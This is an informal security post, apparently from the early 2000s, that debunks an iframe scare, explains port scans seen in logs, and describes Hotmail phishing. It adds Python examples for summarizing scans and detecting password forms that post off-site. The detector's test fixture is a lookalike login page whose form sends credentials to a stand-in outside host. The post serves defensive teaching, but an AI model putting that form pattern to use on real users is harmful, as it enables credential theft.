so is this really a danger?..nope..what in effect happens is that _your_ browser gets told to act as a local file browser...by the local user...you...in other words, you can see it, no one else can (unless you've got some other bug going on). you can get much the same result by going to (in msie) file menu, open, browse, and opening for instance c:\autoexec.bat (same in netscape if i remember right)
the above iframe example was stolen from: http://www.security4.ch.vu
THEY use it to scare people (or try to) into buying their security software. HOAX!!!
i'm not saying don't purchase security software, hey use a good virus scanner, a good firewall BUT remember this, the most exploited security vulnerability is in one place
*gosh* look at how everyone is listening up....that place is...
THE USER!!!
in effect, if the user refuses to choose good passwords (or doesn't know how to) and refuses to spend at least a little time keeping up with what can and can't be done, expect them to be tricked, used, abused and harassed
end my personal rant
my ladyfriend also made an example of this too...she's got nicer explanations too
well are you? are you running netbios open to the internet? (ports 137-139) or are you running icq webserver (port 80) or an ftpd or another httpd? are you reading your logs? i'm not saying sit down and read them as if they were the newest book from your favourite author, but reading the logs can be informative.
for instance: extract from logs
all these affect only M$ and some only NT / Win2K (possibly xp?) and IIS, still, they do scan, i get quite a few of them.
so are these scans a large security risk? not really (usually) unless you run a vulnerable system, most people don't even bother tracking these down today because the users often don't know that their computer is being used to scan other computers, but i figured i'd put it in here even if it's not REALLY a fraud
still there are vulnerabilities out there, so if you run a server, keep up to date on server and cgi vulnerabilities, if you don't KNOW if you are running a server, find out, or ask someone to find out for you
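reading the logs is easier when something boils them down for you. here's a small added example (my own illustration, not the log extract mentioned above, which isn't reproduced here): it parses a few constructed firewall-style lines in an invented layout and summarizes, per source address, how often the ports this post talks about (netbios 137-139, http 80, ftp 21) got poked. the log format, addresses and timestamps are all made up for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log lines in an invented personal-firewall style.
# Not the author's log extract; addresses are documentation ranges.
SAMPLE_LOG = """\
2002-03-01 10:02:13 DROP TCP 192.0.2.10:1034 -> 198.51.100.7:137
2002-03-01 10:02:13 DROP UDP 192.0.2.10:1035 -> 198.51.100.7:137
2002-03-01 10:02:14 DROP TCP 192.0.2.10:1036 -> 198.51.100.7:139
2002-03-01 10:05:41 DROP TCP 203.0.113.5:4021 -> 198.51.100.7:80
2002-03-01 10:05:41 DROP TCP 203.0.113.5:4022 -> 198.51.100.7:80
2002-03-01 10:09:02 DROP TCP 203.0.113.5:4023 -> 198.51.100.7:21
2002-03-01 11:00:00 DROP TCP 192.0.2.77:2000 -> 198.51.100.7:6000
"""

# One regex for the invented layout: date time ACTION PROTO src:port -> dst:port
LINE_RE = re.compile(
    r"^\S+ \S+ (?P<action>\w+) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# The services the post names: netbios (137-139), web (80), ftp (21).
WATCHED_PORTS = {
    137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn",
    80: "http", 21: "ftp",
}


def parse_log(text):
    """Return a list of (source_ip, destination_port) for every line that
    matches the expected layout; anything else is skipped, not guessed at."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append((m["src"], int(m["dport"])))
    return events


def summarize_scanners(events, min_hits=2):
    """Group watched-port hits by source address.
    Only sources with at least min_hits such attempts are kept, so a single
    stray packet does not show up as a 'scan'."""
    per_source = defaultdict(Counter)
    for src, port in events:
        if port in WATCHED_PORTS:
            per_source[src][port] += 1
    return {src: c for src, c in per_source.items() if sum(c.values()) >= min_hits}


def report(summary):
    """Render the summary as one readable line per source."""
    lines = []
    for src, counts in sorted(summary.items()):
        ports = ", ".join(
            f"{p} ({WATCHED_PORTS[p]}) x{n}" for p, n in sorted(counts.items())
        )
        lines.append(f"{src}: {ports}")
    return lines


if __name__ == "__main__":
    for line in report(summarize_scanners(parse_log(SAMPLE_LOG))):
        print(line)
```

the 192.0.2.77 entry hitting port 6000 drops out of the report because it isn't a watched port; the two other sources show up with their per-port counts, which is usually all you need to decide whether something is worth a closer look.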
there are "gold diggers" in hotmail land, gold diggers refer to people who send mails from spoofed or faked addresses (like support1@hotmail.com) or "staff" and similar and ask for your password and login..OR..alternatively they send a letter like the one i received in my "spam and throw" account....
it contained the subject "your account will be closed in 3 days"
the apparent sender (sender address) was support@hotmail.com
and the message body contained an error message and a login box...very similar to hotmail's own...in fact it was a copy of it..with a few modifications
one of these modifications being a formmail call to another host...
so why doth this matter?...well it'd mail the result to that host at the same time as it's logging you in again..that's why...
in effect you are logging in AND giving the sender of that mail your login and password
i'll put up a somewhat safe (note!!! that does not mean that it is "safe"..just more so than the original) demo version of this
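the giveaway in that mail was the form posting somewhere other than hotmail. here's an added example (mine, not the author's demo version and not the mail itself) that does the check mechanically: it pulls every form out of a page, and flags any form that has a password field but whose action resolves to a host outside the ones you trust. the sample page, the hostnames and the script name are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Constructed sample: a lookalike login page whose credential form posts to an
# outside host. Written for this example, not copied from the mail described above.
LOOKALIKE_PAGE = """
<html><body>
<p>Error: your session has expired. Please log in again.</p>
<form method="post" action="http://cgi.example-other-host.test/formmail.pl">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</form>
<form method="post" action="/cgi-bin/dologin">
  <input type="hidden" name="retry" value="1">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the (type, name) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((attrs.get("type") or "text").lower(), attrs.get("name") or "")
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_leaks(html, page_url, trusted_hosts):
    """Return the resolved action URLs of forms that carry a password field but
    post to a host that is not one of trusted_hosts (or a subdomain of one).
    Relative actions are resolved against page_url, so a form posting back to
    the site you are actually on is not flagged. A mailto: or otherwise
    hostless action has no hostname and is therefore flagged too."""
    parser = FormCollector()
    parser.feed(html)
    leaks = []
    for form in parser.forms:
        if not any(t == "password" for t, _ in form["inputs"]):
            continue
        target = urljoin(page_url, form["action"])
        host = (urlparse(target).hostname or "").lower()
        if not any(host == h or host.endswith("." + h) for h in trusted_hosts):
            leaks.append(target)
    return leaks


if __name__ == "__main__":
    for url in find_credential_leaks(LOOKALIKE_PAGE, "http://login.hotmail.com/", {"hotmail.com"}):
        print("password form posts off-site:", url)
```

the second form in the sample isn't flagged even though it posts to a relative path, because it has no password field; the first one is, because the password goes to a host you never agreed to talk to. that's the whole trick the "gold diggers" rely on, in one line of output.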